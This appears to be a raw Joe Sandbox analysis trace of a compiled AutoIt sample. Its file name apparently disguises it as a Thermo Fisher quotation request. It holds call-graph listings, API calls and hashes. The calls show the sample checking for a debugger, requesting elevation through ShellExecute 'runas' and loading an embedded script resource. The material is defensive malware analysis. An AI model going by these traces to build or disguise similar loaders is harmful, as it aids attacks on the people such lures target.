47 API calls 93649->93650 93650->93640 93651->93622 93652->93626 93653->93626 93655 627d05 93654->93655 93656 627d18 EnterCriticalSection 93654->93656 93661 627d7c 93655->93661 93656->93633 93658 627d0b 93658->93656 93685 62115b 47 API calls 3 library calls 93658->93685 93662 627d88 _wprintf 93661->93662 93663 627d91 93662->93663 93664 627da9 93662->93664 93686 6281c2 47 API calls 2 library calls 93663->93686 93668 627e11 _wprintf 93664->93668 93679 627da7 93664->93679 93667 627d96 93687 62821f 47 API calls 8 library calls 93667->93687 93668->93658 93669 627dbd 93671 627dd3 93669->93671 93672 627dc4 93669->93672 93675 627cf4 __lock 46 API calls 93671->93675 93690 627c0e 47 API calls __getptd_noexit 93672->93690 93673 627d9d 93688 621145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93673->93688 93678 627dda 93675->93678 93677 627dc9 93677->93668 93680 627de9 InitializeCriticalSectionAndSpinCount 93678->93680 93681 627dfe 93678->93681 93679->93664 93689 6269d0 47 API calls std::exception::_Copy_str 93679->93689 93682 627e04 93680->93682 93683 621c9d _free 46 API calls 93681->93683 93691 627e1a LeaveCriticalSection _doexit 93682->93691 93683->93682 93686->93667 93687->93673 93689->93669 93690->93677 93691->93668 93693 622c97 93692->93693 93694 622cbb 93692->93694 93693->93694 93695 622933 __fseek_nolock 47 API calls 93693->93695 93698 62eb36 93694->93698 93696 622cb4 93695->93696 93734 62af61 93696->93734 93699 62eb43 93698->93699 93701 6235af 93698->93701 93700 621c9d _free 47 API calls 93699->93700 93699->93701 93700->93701 93702 622933 93701->93702 93703 622952 93702->93703 93704 62293d 93702->93704 93703->93647 93871 627c0e 47 API calls __getptd_noexit 93704->93871 93706 622942 93872 626e10 8 API calls __cftof2_l 93706->93872 93708 62294d 93708->93647 93710 62e9de _wprintf 93709->93710 93711 62e9e6 93710->93711 93712 62e9fe 93710->93712 93888 627bda 47 API calls __getptd_noexit 93711->93888 93714 62ea7b 93712->93714 93719 62ea28 93712->93719 
93892 627bda 47 API calls __getptd_noexit 93714->93892 93715 62e9eb 93889 627c0e 47 API calls __getptd_noexit 93715->93889 93718 62ea80 93893 627c0e 47 API calls __getptd_noexit 93718->93893 93721 62a8ed ___lock_fhandle 49 API calls 93719->93721 93723 62ea2e 93721->93723 93722 62ea88 93894 626e10 8 API calls __cftof2_l 93722->93894 93725 62ea41 93723->93725 93726 62ea4c 93723->93726 93873 62ea9c 93725->93873 93890 627c0e 47 API calls __getptd_noexit 93726->93890 93729 62ea47 93891 62ea73 LeaveCriticalSection __unlock_fhandle 93729->93891 93730 62e9f3 _wprintf 93730->93649 93732->93639 93733->93640 93735 62af6d _wprintf 93734->93735 93736 62af75 93735->93736 93737 62af8d 93735->93737 93832 627bda 47 API calls __getptd_noexit 93736->93832 93739 62b022 93737->93739 93744 62afbf 93737->93744 93837 627bda 47 API calls __getptd_noexit 93739->93837 93740 62af7a 93833 627c0e 47 API calls __getptd_noexit 93740->93833 93743 62b027 93838 627c0e 47 API calls __getptd_noexit 93743->93838 93759 62a8ed 93744->93759 93747 62b02f 93839 626e10 8 API calls __cftof2_l 93747->93839 93748 62afc5 93750 62afeb 93748->93750 93751 62afd8 93748->93751 93834 627c0e 47 API calls __getptd_noexit 93750->93834 93768 62b043 93751->93768 93753 62af82 _wprintf 93753->93694 93755 62aff0 93835 627bda 47 API calls __getptd_noexit 93755->93835 93756 62afe4 93836 62b01a LeaveCriticalSection __unlock_fhandle 93756->93836 93760 62a8f9 _wprintf 93759->93760 93761 62a946 EnterCriticalSection 93760->93761 93762 627cf4 __lock 47 API calls 93760->93762 93763 62a96c _wprintf 93761->93763 93764 62a91d 93762->93764 93763->93748 93765 62a93a 93764->93765 93766 62a928 InitializeCriticalSectionAndSpinCount 93764->93766 93840 62a970 LeaveCriticalSection _doexit 93765->93840 93766->93765 93769 62b050 __ftell_nolock 93768->93769 93770 62b0ac 93769->93770 93771 62b08d 93769->93771 93799 62b082 93769->93799 93775 62b105 93770->93775 93776 62b0e9 93770->93776 93850 627bda 47 API calls __getptd_noexit 93771->93850 93774 
62b092 93851 627c0e 47 API calls __getptd_noexit 93774->93851 93779 62b11c 93775->93779 93856 62f82f 49 API calls 3 library calls 93775->93856 93853 627bda 47 API calls __getptd_noexit 93776->93853 93777 62b86b 93777->93756 93841 633bf2 93779->93841 93781 62b099 93852 626e10 8 API calls __cftof2_l 93781->93852 93784 62b0ee 93854 627c0e 47 API calls __getptd_noexit 93784->93854 93786 62b12a 93788 62b44b 93786->93788 93857 627a0d 47 API calls 2 library calls 93786->93857 93790 62b463 93788->93790 93791 62b7b8 WriteFile 93788->93791 93789 62b0f5 93855 626e10 8 API calls __cftof2_l 93789->93855 93795 62b55a 93790->93795 93803 62b479 93790->93803 93793 62b7e1 GetLastError 93791->93793 93801 62b410 93791->93801 93793->93801 93806 62b663 93795->93806 93809 62b565 93795->93809 93796 62b150 GetConsoleMode 93796->93788 93798 62b189 93796->93798 93797 62b81b 93797->93799 93862 627c0e 47 API calls __getptd_noexit 93797->93862 93798->93788 93802 62b199 GetConsoleCP 93798->93802 93864 62a70c 93799->93864 93801->93797 93801->93799 93808 62b7f7 93801->93808 93802->93801 93826 62b1c2 93802->93826 93803->93797 93804 62b4e9 WriteFile 93803->93804 93804->93793 93805 62b526 93804->93805 93805->93801 93805->93803 93815 62b555 93805->93815 93806->93797 93810 62b6d8 WideCharToMultiByte 93806->93810 93807 62b843 93863 627bda 47 API calls __getptd_noexit 93807->93863 93812 62b812 93808->93812 93813 62b7fe 93808->93813 93809->93797 93814 62b5de WriteFile 93809->93814 93810->93793 93824 62b71f 93810->93824 93861 627bed 47 API calls 3 library calls 93812->93861 93859 627c0e 47 API calls __getptd_noexit 93813->93859 93814->93793 93818 62b62d 93814->93818 93815->93801 93818->93801 93818->93809 93818->93815 93819 62b727 WriteFile 93822 62b77a GetLastError 93819->93822 93819->93824 93820 62b803 93860 627bda 47 API calls __getptd_noexit 93820->93860 93822->93824 93824->93801 93824->93806 93824->93815 93824->93819 93825 635884 WriteConsoleW CreateFileW __chsize_nolock 93830 62b2f6 93825->93830 
93826->93801 93827 6340f7 59 API calls __chsize_nolock 93826->93827 93828 62b28f WideCharToMultiByte 93826->93828 93826->93830 93858 621688 57 API calls __isleadbyte_l 93826->93858 93827->93826 93828->93801 93829 62b2ca WriteFile 93828->93829 93829->93793 93829->93830 93830->93793 93830->93801 93830->93825 93830->93826 93831 62b321 WriteFile 93830->93831 93831->93793 93831->93830 93832->93740 93833->93753 93834->93755 93835->93756 93836->93753 93837->93743 93838->93747 93839->93753 93840->93761 93842 633c0a 93841->93842 93843 633bfd 93841->93843 93846 633c16 93842->93846 93847 627c0e __cftof2_l 47 API calls 93842->93847 93844 627c0e __cftof2_l 47 API calls 93843->93844 93845 633c02 93844->93845 93845->93786 93846->93786 93848 633c37 93847->93848 93849 626e10 __cftof2_l 8 API calls 93848->93849 93849->93845 93850->93774 93851->93781 93852->93799 93853->93784 93854->93789 93855->93799 93856->93779 93857->93796 93858->93826 93859->93820 93860->93799 93861->93799 93862->93807 93863->93799 93865 62a716 IsProcessorFeaturePresent 93864->93865 93866 62a714 93864->93866 93868 6337b0 93865->93868 93866->93777 93869 63375f ___raise_securityfailure 5 API calls 93868->93869 93870 633893 93869->93870 93870->93777 93871->93706 93872->93708 93895 62aba4 93873->93895 93875 62eb00 93908 62ab1e 48 API calls 2 library calls 93875->93908 93876 62eaaa 93876->93875 93879 62aba4 __lseeki64_nolock 47 API calls 93876->93879 93887 62eade 93876->93887 93878 62eb08 93884 62eb2a 93878->93884 93909 627bed 47 API calls 3 library calls 93878->93909 93881 62ead5 93879->93881 93880 62aba4 __lseeki64_nolock 47 API calls 93882 62eaea CloseHandle 93880->93882 93885 62aba4 __lseeki64_nolock 47 API calls 93881->93885 93882->93875 93886 62eaf6 GetLastError 93882->93886 93884->93729 93885->93887 93886->93875 93887->93875 93887->93880 93888->93715 93889->93730 93890->93729 93891->93730 93892->93718 93893->93722 93894->93730 93896 62abaf 93895->93896 93898 62abc4 93895->93898 93910 627bda 47 API calls 
__getptd_noexit 93896->93910 93902 62abe9 93898->93902 93912 627bda 47 API calls __getptd_noexit 93898->93912 93899 62abb4 93911 627c0e 47 API calls __getptd_noexit 93899->93911 93902->93876 93903 62abf3 93913 627c0e 47 API calls __getptd_noexit 93903->93913 93904 62abbc 93904->93876 93906 62abfb 93914 626e10 8 API calls __cftof2_l 93906->93914 93908->93878 93909->93884 93910->93899 93911->93904 93912->93903 93913->93906 93914->93904 93916 646529 93915->93916 93917 646cc4 FindFirstFileW 93915->93917 93916->93355 93917->93916 93918 646cd9 FindClose 93917->93918 93918->93916 94010 604214 93919->94010 93924 674f73 93926 604252 84 API calls 93924->93926 93925 6041d4 LoadLibraryExW 94020 604291 93925->94020 93928 674f7a 93926->93928 93930 604291 3 API calls 93928->93930 93932 674f82 93930->93932 94046 6044ed 93932->94046 93933 6041fb 93933->93932 93934 604207 93933->93934 93935 604252 84 API calls 93934->93935 93937 60420c 93935->93937 93937->93469 93937->93471 93940 674fa9 94054 604950 93940->94054 94229 621e46 93943->94229 93947 646918 _wcschr __ftell_nolock 93946->93947 93948 64692e _wcscat _wcscpy 93947->93948 93949 621dfc __wsplitpath 47 API calls 93947->93949 93948->93491 93950 64695d 93949->93950 93951 621dfc __wsplitpath 47 API calls 93950->93951 93951->93948 93953 64bfb1 __ftell_nolock 93952->93953 93954 61f4ea 48 API calls 93953->93954 93955 64c00e 93954->93955 93956 6047b7 48 API calls 93955->93956 93957 64c018 93956->93957 93958 64bdb4 GetSystemTimeAsFileTime 93957->93958 93959 64c023 93958->93959 93960 604517 83 API calls 93959->93960 93961 64c036 _wcscmp 93960->93961 93962 64c107 93961->93962 93963 64c05a 93961->93963 93964 64c56d 94 API calls 93962->93964 94272 64c56d 93963->94272 93980 64c0d3 _wcscat 93964->93980 93967 621dfc __wsplitpath 47 API calls 93972 64c088 _wcscat _wcscpy 93967->93972 93968 6044ed 64 API calls 93970 64c12c 93968->93970 93969 64c110 93969->93497 93971 6044ed 64 API calls 93970->93971 93973 64c13c 93971->93973 93975 621dfc 
__wsplitpath 47 API calls 93972->93975 93974 6044ed 64 API calls 93973->93974 93976 64c157 93974->93976 93975->93980 93977 6044ed 64 API calls 93976->93977 93978 64c167 93977->93978 93979 6044ed 64 API calls 93978->93979 93981 64c182 93979->93981 93980->93968 93980->93969 93982 6044ed 64 API calls 93981->93982 93983 64c192 93982->93983 93984 6044ed 64 API calls 93983->93984 93985 64c1a2 93984->93985 93986 6044ed 64 API calls 93985->93986 93987 64c1b2 93986->93987 94255 64c71a GetTempPathW GetTempFileNameW 93987->94255 93989 64c1be 93990 623499 117 API calls 93989->93990 94000 64c1cf 93990->94000 93991 64c289 93992 6235e4 __fcloseall 83 API calls 93991->93992 93993 64c294 93992->93993 93995 64c2ae 93993->93995 93996 64c29a DeleteFileW 93993->93996 93994 6044ed 64 API calls 93994->94000 93997 64c342 CopyFileW 93995->93997 94002 64c2b8 93995->94002 93996->93969 94000->93969 94000->93991 94000->93994 94256 622aae 94000->94256 94278 64b965 118 API calls __fcloseall 94002->94278 94007->93460 94008->93483 94009->93488 94059 604339 94010->94059 94013 60423c 94015 604244 FreeLibrary 94013->94015 94016 6041bb 94013->94016 94015->94016 94017 623499 94016->94017 94067 6234ae 94017->94067 94019 6041c8 94019->93924 94019->93925 94146 6042e4 94020->94146 94023 6042b8 94025 6042c1 FreeLibrary 94023->94025 94026 6041ec 94023->94026 94025->94026 94027 604380 94026->94027 94028 61f4ea 48 API calls 94027->94028 94029 604395 94028->94029 94154 6047b7 94029->94154 94031 6043a1 _memcpy_s 94032 6043dc 94031->94032 94034 6044d1 94031->94034 94035 604499 94031->94035 94033 604950 57 API calls 94032->94033 94041 6043e5 94033->94041 94168 64c750 93 API calls 94034->94168 94157 60406b CreateStreamOnHGlobal 94035->94157 94038 6044ed 64 API calls 94038->94041 94040 604479 94040->93933 94041->94038 94041->94040 94042 674ed7 94041->94042 94163 604517 94041->94163 94043 604517 83 API calls 94042->94043 94044 674eeb 94043->94044 94045 6044ed 64 API calls 94044->94045 94045->94040 94047 674fc0 
94046->94047 94048 6044ff 94046->94048 94186 62381e 94048->94186 94051 64bf5a 94206 64bdb4 94051->94206 94053 64bf70 94053->93940 94055 675002 94054->94055 94056 60495f 94054->94056 94211 623e65 94056->94211 94058 604967 94063 60434b 94059->94063 94062 604321 LoadLibraryA GetProcAddress 94062->94013 94064 60422f 94063->94064 94065 604354 LoadLibraryA 94063->94065 94064->94013 94064->94062 94065->94064 94066 604365 GetProcAddress 94065->94066 94066->94064 94068 6234ba _wprintf 94067->94068 94069 6234cd 94068->94069 94072 6234fe 94068->94072 94115 627c0e 47 API calls __getptd_noexit 94069->94115 94071 6234d2 94116 626e10 8 API calls __cftof2_l 94071->94116 94086 62e4c8 94072->94086 94075 623503 94076 623519 94075->94076 94077 62350c 94075->94077 94079 623543 94076->94079 94080 623523 94076->94080 94117 627c0e 47 API calls __getptd_noexit 94077->94117 94100 62e5e0 94079->94100 94118 627c0e 47 API calls __getptd_noexit 94080->94118 94082 6234dd _wprintf @_EH4_CallFilterFunc@8 94082->94019 94087 62e4d4 _wprintf 94086->94087 94088 627cf4 __lock 47 API calls 94087->94088 94089 62e4e2 94088->94089 94090 62e559 94089->94090 94095 627d7c __mtinitlocknum 47 API calls 94089->94095 94098 62e552 94089->94098 94123 624e5b 48 API calls __lock 94089->94123 94124 624ec5 LeaveCriticalSection LeaveCriticalSection _doexit 94089->94124 94125 6269d0 47 API calls std::exception::_Copy_str 94090->94125 94093 62e560 94094 62e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 94093->94094 94093->94098 94094->94098 94095->94089 94097 62e5cc _wprintf 94097->94075 94120 62e5d7 94098->94120 94108 62e600 __wopenfile 94100->94108 94101 62e61a 94130 627c0e 47 API calls __getptd_noexit 94101->94130 94103 62e61f 94131 626e10 8 API calls __cftof2_l 94103->94131 94105 62354e 94119 623570 LeaveCriticalSection LeaveCriticalSection _fprintf 94105->94119 94106 62e838 94127 6363c9 94106->94127 94108->94101 94114 62e7d5 94108->94114 94132 62185b 59 API calls 2 library calls 94108->94132 94110 
62e7ce 94110->94114 94133 62185b 59 API calls 2 library calls 94110->94133 94112 62e7ed 94112->94114 94134 62185b 59 API calls 2 library calls 94112->94134 94114->94101 94114->94106 94115->94071 94116->94082 94117->94082 94118->94082 94119->94082 94126 627e58 LeaveCriticalSection 94120->94126 94122 62e5de 94122->94097 94123->94089 94124->94089 94125->94093 94126->94122 94135 635bb1 94127->94135 94129 6363e2 94129->94105 94130->94103 94131->94105 94132->94110 94133->94112 94134->94114 94138 635bbd _wprintf 94135->94138 94136 635bcf 94137 627c0e __cftof2_l 47 API calls 94136->94137 94139 635bd4 94137->94139 94138->94136 94140 635c06 94138->94140 94141 626e10 __cftof2_l 8 API calls 94139->94141 94142 635c78 __wsopen_helper 110 API calls 94140->94142 94145 635bde _wprintf 94141->94145 94143 635c23 94142->94143 94144 635c4c __wsopen_helper LeaveCriticalSection 94143->94144 94144->94145 94145->94129 94150 6042f6 94146->94150 94149 6042cc LoadLibraryA GetProcAddress 94149->94023 94151 6042aa 94150->94151 94152 6042ff LoadLibraryA 94150->94152 94151->94023 94151->94149 94152->94151 94153 604310 GetProcAddress 94152->94153 94153->94151 94155 61f4ea 48 API calls 94154->94155 94156 6047c9 94155->94156 94156->94031 94158 604085 FindResourceExW 94157->94158 94162 6040a2 94157->94162 94159 674f16 LoadResource 94158->94159 94158->94162 94160 674f2b SizeofResource 94159->94160 94159->94162 94161 674f3f LockResource 94160->94161 94160->94162 94161->94162 94162->94032 94164 604526 94163->94164 94165 674fe0 94163->94165 94169 623a8d 94164->94169 94167 604534 94167->94041 94168->94032 94171 623a99 _wprintf 94169->94171 94170 623aa7 94182 627c0e 47 API calls __getptd_noexit 94170->94182 94171->94170 94173 623acd 94171->94173 94175 624e1c __lock_file 48 API calls 94173->94175 94174 623aac 94183 626e10 8 API calls __cftof2_l 94174->94183 94177 623ad3 94175->94177 94184 6239fe 81 API calls 4 library calls 94177->94184 94179 623ae2 94185 623b04 LeaveCriticalSection LeaveCriticalSection 
_fprintf 94179->94185 94181 623ab7 _wprintf 94181->94167 94182->94174 94183->94181 94184->94179 94185->94181 94189 623839 94186->94189 94188 604510 94188->94051 94190 623845 _wprintf 94189->94190 94191 62385b _memset 94190->94191 94192 623888 94190->94192 94194 623880 _wprintf 94190->94194 94202 627c0e 47 API calls __getptd_noexit 94191->94202 94193 624e1c __lock_file 48 API calls 94192->94193 94195 62388e 94193->94195 94194->94188 94204 62365b 62 API calls 6 library calls 94195->94204 94198 623875 94203 626e10 8 API calls __cftof2_l 94198->94203 94199 6238a4 94205 6238c2 LeaveCriticalSection LeaveCriticalSection _fprintf 94199->94205 94202->94198 94203->94194 94204->94199 94205->94194 94209 62344a GetSystemTimeAsFileTime 94206->94209 94208 64bdc3 94208->94053 94210 623478 __aulldiv 94209->94210 94210->94208 94212 623e71 _wprintf 94211->94212 94213 623e94 94212->94213 94214 623e7f 94212->94214 94215 624e1c __lock_file 48 API calls 94213->94215 94225 627c0e 47 API calls __getptd_noexit 94214->94225 94218 623e9a 94215->94218 94217 623e84 94226 626e10 8 API calls __cftof2_l 94217->94226 94227 623b0c 55 API calls 5 library calls 94218->94227 94221 623ea5 94228 623ec5 LeaveCriticalSection LeaveCriticalSection _fprintf 94221->94228 94223 623eb7 94224 623e8f _wprintf 94223->94224 94224->94058 94225->94217 94226->94224 94227->94221 94228->94223 94230 621e61 94229->94230 94233 621e55 94229->94233 94253 627c0e 47 API calls __getptd_noexit 94230->94253 94232 622019 94240 621e41 94232->94240 94254 626e10 8 API calls __cftof2_l 94232->94254 94233->94230 94236 621ed4 94233->94236 94248 629d6b 47 API calls __cftof2_l 94233->94248 94236->94230 94242 621f41 94236->94242 94249 629d6b 47 API calls __cftof2_l 94236->94249 94237 621fa0 94237->94230 94239 621fb0 94237->94239 94237->94240 94238 621f5f 94238->94230 94241 621f7b 94238->94241 94250 629d6b 47 API calls __cftof2_l 94238->94250 94252 629d6b 47 API calls __cftof2_l 94239->94252 94240->93485 94241->94230 94241->94240 94245 
621f91 94241->94245 94242->94237 94242->94238 94251 629d6b 47 API calls __cftof2_l 94245->94251 94248->94236 94249->94242 94250->94241 94251->94240 94252->94240 94253->94232 94254->94240 94255->93989 94257 622aba _wprintf 94256->94257 94258 622ad4 94257->94258 94259 622aec 94257->94259 94260 622ae4 _wprintf 94257->94260 94291 627c0e 47 API calls __getptd_noexit 94258->94291 94261 624e1c __lock_file 48 API calls 94259->94261 94260->94000 94263 622af2 94261->94263 94279 622957 94263->94279 94264 622ad9 94292 626e10 8 API calls __cftof2_l 94264->94292 94277 64c581 __tzset_nolock _wcscmp 94272->94277 94273 6044ed 64 API calls 94273->94277 94274 64c05f 94274->93967 94274->93969 94275 64bf5a GetSystemTimeAsFileTime 94275->94277 94276 604517 83 API calls 94276->94277 94277->94273 94277->94274 94277->94275 94277->94276 94291->94264 94292->94260 94297->93539 94298->93505 94299->93513 94300->93515 94301->93531 94302->93533 94303->93234 94304->93234 94305->93230 94306->93230 94307->93229 94308->93224 94309->93239 94310->93251 94311->93251 94312->93245 94313->93268 94314 603742 94315 60374b 94314->94315 94316 6037c8 94315->94316 94317 603769 94315->94317 94355 6037c6 94315->94355 94319 671e00 94316->94319 94320 6037ce 94316->94320 94321 603776 94317->94321 94322 60382c PostQuitMessage 94317->94322 94318 6037ab DefWindowProcW 94344 6037b9 94318->94344 94369 602ff6 16 API calls 94319->94369 94323 6037d3 94320->94323 94324 6037f6 SetTimer RegisterWindowMessageW 94320->94324 94326 603781 94321->94326 94327 671e88 94321->94327 94322->94344 94332 671da3 94323->94332 94333 6037da KillTimer 94323->94333 94328 60381f CreatePopupMenu 94324->94328 94324->94344 94329 603836 94326->94329 94330 603789 94326->94330 94384 644ddd 60 API calls _memset 94327->94384 94328->94344 94359 61eb83 94329->94359 94336 603794 94330->94336 94348 671e6d 94330->94348 94338 671ddc MoveWindow 94332->94338 94339 671da8 94332->94339 94366 603847 Shell_NotifyIconW _memset 94333->94366 94334 671e27 94370 61e312 
335 API calls Mailbox 94334->94370 94341 60379f 94336->94341 94342 671e58 94336->94342 94338->94344 94345 671dac 94339->94345 94346 671dcb SetFocus 94339->94346 94341->94318 94371 603847 Shell_NotifyIconW _memset 94341->94371 94382 6455bd 70 API calls _memset 94342->94382 94343 671e9a 94343->94318 94343->94344 94345->94341 94349 671db5 94345->94349 94346->94344 94347 6037ed 94367 60390f DeleteObject DestroyWindow Mailbox 94347->94367 94348->94318 94383 63a5f3 48 API calls 94348->94383 94368 602ff6 16 API calls 94349->94368 94354 671e68 94354->94344 94355->94318 94357 671e4c 94372 604ffc 94357->94372 94360 61eb9a _memset 94359->94360 94361 61ec1c 94359->94361 94385 6051af 94360->94385 94361->94344 94363 61ec05 KillTimer SetTimer 94363->94361 94364 61ebc1 94364->94363 94365 673c7a Shell_NotifyIconW 94364->94365 94365->94363 94366->94347 94367->94344 94368->94344 94369->94334 94370->94341 94371->94357 94373 605027 _memset 94372->94373 94446 604c30 94373->94446 94376 6050ac 94378 6050ca Shell_NotifyIconW 94376->94378 94379 673d28 Shell_NotifyIconW 94376->94379 94380 6051af 50 API calls 94378->94380 94381 6050df 94380->94381 94381->94355 94382->94354 94383->94355 94384->94343 94386 6052a2 Mailbox 94385->94386 94387 6051cb 94385->94387 94386->94364 94388 606b0f 48 API calls 94387->94388 94389 6051d9 94388->94389 94390 673ca1 LoadStringW 94389->94390 94391 6051e6 94389->94391 94394 673cbb 94390->94394 94392 606a63 48 API calls 94391->94392 94393 6051fb 94392->94393 94393->94394 94395 60520c 94393->94395 94396 60510d 48 API calls 94394->94396 94397 605216 94395->94397 94398 6052a7 94395->94398 94401 673cc5 94396->94401 94407 60510d 94397->94407 94399 606eed 48 API calls 94398->94399 94404 605220 _memset _wcscpy 94399->94404 94401->94404 94416 60518c 94401->94416 94403 673ce7 94406 60518c 48 API calls 94403->94406 94405 605288 Shell_NotifyIconW 94404->94405 94405->94386 94406->94404 94408 671be7 94407->94408 94409 60511f 94407->94409 94435 63a58f 48 API calls _memcpy_s 

                                                              Control-flow Graph

Memory Dump Source
• Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
• Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd

                                                              Control-flow Graph

                                                              APIs
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00603AA3,?), ref: 00603D45
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,00603AA3,?), ref: 00603D57
                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,006C1148,006C1130,?,?,?,?,00603AA3,?), ref: 00603DC8
                                                                • Part of subcall function 00606430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00603DEE,006C1148,?,?,?,?,?,00603AA3,?), ref: 00606471
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,00603AA3,?), ref: 00603E48
                                                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,006B28F4,00000010), ref: 00671CCE
                                                              • SetCurrentDirectoryW.KERNEL32(?,006C1148,?,?,?,?,?,00603AA3,?), ref: 00671D06
                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0069DAB4,006C1148,?,?,?,?,?,00603AA3,?), ref: 00671D89
                                                              • ShellExecuteW.SHELL32(00000000,?,?,?,?,00603AA3), ref: 00671D90
                                                                • Part of subcall function 00603E6E: GetSysColorBrush.USER32(0000000F), ref: 00603E79
                                                                • Part of subcall function 00603E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00603E88
                                                                • Part of subcall function 00603E6E: LoadIconW.USER32(00000063), ref: 00603E9E
                                                                • Part of subcall function 00603E6E: LoadIconW.USER32(000000A4), ref: 00603EB0
                                                                • Part of subcall function 00603E6E: LoadIconW.USER32(000000A2), ref: 00603EC2
                                                                • Part of subcall function 00603E6E: RegisterClassExW.USER32(?), ref: 00603F30
                                                                • Part of subcall function 006036B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006036E6
                                                                • Part of subcall function 006036B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00603707
                                                                • Part of subcall function 006036B8: ShowWindow.USER32(00000000,?,?,?,?,00603AA3,?), ref: 0060371B
                                                                • Part of subcall function 006036B8: ShowWindow.USER32(00000000,?,?,?,?,00603AA3,?), ref: 00603724
                                                                • Part of subcall function 00604FFC: _memset.LIBCMT ref: 00605022
                                                                • Part of subcall function 00604FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 006050CB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                              • String ID: ()k$This is a third-party compiled AutoIt script.$runas
                                                              • API String ID: 438480954-3464277351
                                                              • Opcode ID: 46b6013093cfb85d1ded0cca5b7fbc704d27e8e88aac66976a65e0e486312d89
                                                              • Instruction ID: 8158fb42969a8303dd1f9cc4c82e3f848957fe651b49495ba8750dcd5d1b0069
                                                              • Opcode Fuzzy Hash: 46b6013093cfb85d1ded0cca5b7fbc704d27e8e88aac66976a65e0e486312d89
                                                              • Instruction Fuzzy Hash: F7510830A84249AACF19ABB4DC55EFF7B7B9F07700F04526DF5026B2D2DA6446458B21

                                                              Control-flow Graph: function at 0061DDC0

                                                              APIs
                                                              • GetVersionExW.KERNEL32(?), ref: 0061DDEC
                                                              • GetCurrentProcess.KERNEL32(00000000,0069DC38,?,?), ref: 0061DEAC
                                                              • GetNativeSystemInfo.KERNELBASE(?,0069DC38,?,?), ref: 0061DF01
                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 0061DF0C
                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 0061DF1F
                                                              • GetSystemInfo.KERNEL32(?,0069DC38,?,?), ref: 0061DF29
                                                              • GetSystemInfo.KERNEL32(?,0069DC38,?,?), ref: 0061DF35
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                              • String ID:
                                                              • API String ID: 3851250370-0
                                                              • Opcode ID: d8646a9658e831df2561aecf791c3bdb5e101117b9ff5e89c5863fef1bcd8987
                                                              • Instruction ID: 965a1ae71ac47ba04da05c0bfbaee92769cf76ae1215339fa61115550a76176e
                                                              • Opcode Fuzzy Hash: d8646a9658e831df2561aecf791c3bdb5e101117b9ff5e89c5863fef1bcd8987
                                                              • Instruction Fuzzy Hash: FE6192B180A384DFCF15CF6898C15E97FB6AF29300B1989D9D8499F34BC634CA49CB65

                                                              Control-flow Graph: function at 0060406B

                                                              APIs
                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0060449E,?,?,00000000,00000001), ref: 0060407B
                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0060449E,?,?,00000000,00000001), ref: 00604092
